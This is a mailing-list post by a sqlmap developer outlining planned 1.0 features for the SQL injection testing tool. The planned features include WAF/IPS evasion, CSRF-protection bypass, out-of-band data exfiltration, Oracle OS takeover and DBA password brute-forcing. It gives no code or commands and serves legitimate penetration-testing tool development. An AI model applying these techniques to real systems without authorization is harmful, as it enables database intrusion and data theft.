Hi, Now that some weeks have passed since 0.9 has been released and we have got the first bunch of bug reports and feature requests (thanks!) it's time to plan the development for the upcoming release: 1.0!
Miroslav and I came up with a pretty well defined list of things to do, but we would appreciate a lot your feedback, comments and help in implementing these and other features. Detection/bisection: * Implement anti-CSRF protection bypass (e.g. .NET VIEWSTATE): this will definitely be in! * Blind SQL injection possible enhancements[1]: we will evaluate this and see if the benefit is worth the code changes, as our bisection algorithm these days is pretty strong, fast and has a lot of possible optimizations always (see -o switch and other relevant ones). * Confirm injection in another page (feature requested by someone on the mailing list) Enumeration: * Enumerate binary fields data: Miroslav has been putting lots of effort into support for unicode characters, recognition of page/dbms encoding and enumeration of "dodgy" character. The next step will be enumeration of binary data (e.g. images in blob datatype columns alike) and reconstruction of this data automatically locally. * Implement out-of-band for data fetching: we may possibly implement this. It would be split down in the following functions: * HTTP requests (Oracle UTL_HTTP) * UNC paths (can be done in all DBMS afaik) * openrowset (to replicate dbms remotely on MSSQL) * db_link() (to replicate dbms remotely on PgSQL) * Data extraction for multiple entries on a single line: we have started to work on this feature. It has been a long time requested feature by many of you. Miscellaneous: * IDS/IPS Evasion: we have got --tamper and support for custom tamper scripts (see user's manual). The next step will be to automatically detect and bypass custom-implemented IDS/IPS and some specific enterprise-grade IPS/WAF solutions. * Report/output in XML/XSLT: feature requested many times. Partially implemented some time ago. It was too outdated and bugged, so did not make it for 0.9. We will possibly implement for 1.0 Plugins: * Support for PostgreSQL 9.0: it is on its way. Active fingerprint (-f) has been adapted. Takeover switch --os-pwn for Windows 32-bit too. Soon LInux and Windows 64-bit too. * Identify linked/cluster DBMS servers when possible: afaik can be done on MSSQL. Any idea how to do this on other DBMS like Oracle? Request: * Decode/reencode parameters in base64/hex: low priority, but might save hell lots of time during pentests where the vulnerable parameter's value has to be encoded before sent to the web server. Takeover: * Operating system access support on Oracle: this might seem easy and very much useful. It's not. Oracle by design does not support stacked queries in SQL statements. It does within PL/SQL code in functions/triggers/etc. Therefore, if the web applications that you are targeting has a SQL injection within a custom or default function/procedure then yes, you are likely to privesc and takeover the OS. Ideas and help to implement this feature is more than welcome! * File system access support on Oracle: same as above. * Option to escalate DBMS user privileges via PL/SQL on Oracle: same as above. * Option to perform DBA password brute-force on PgSQL/MSSQL: it will make it to 1.0. * Download shellcodeexec/file via TFTP/FTP/HTTP from the attacker machine (for --file-write and --os-pwn). There are few other TODO items, mostly related to code refactoring, bug fixes and mandatory things to be done before these features can be worked out. Now we look forward to read from you. Thank you! [1] http://websec.wordpress.com/2011/04/06/blind-sqli-techniques/ -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F ------------------------------------------------------------------------------ WhatsUp Gold - Download Free Network Management Software The most intuitive, comprehensive, and cost-effective network management toolset available today. Delivers lowest initial acquisition cost and overall TCO of any competing solution. http://p.sf.net/sfu/whatsupgold-sd _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
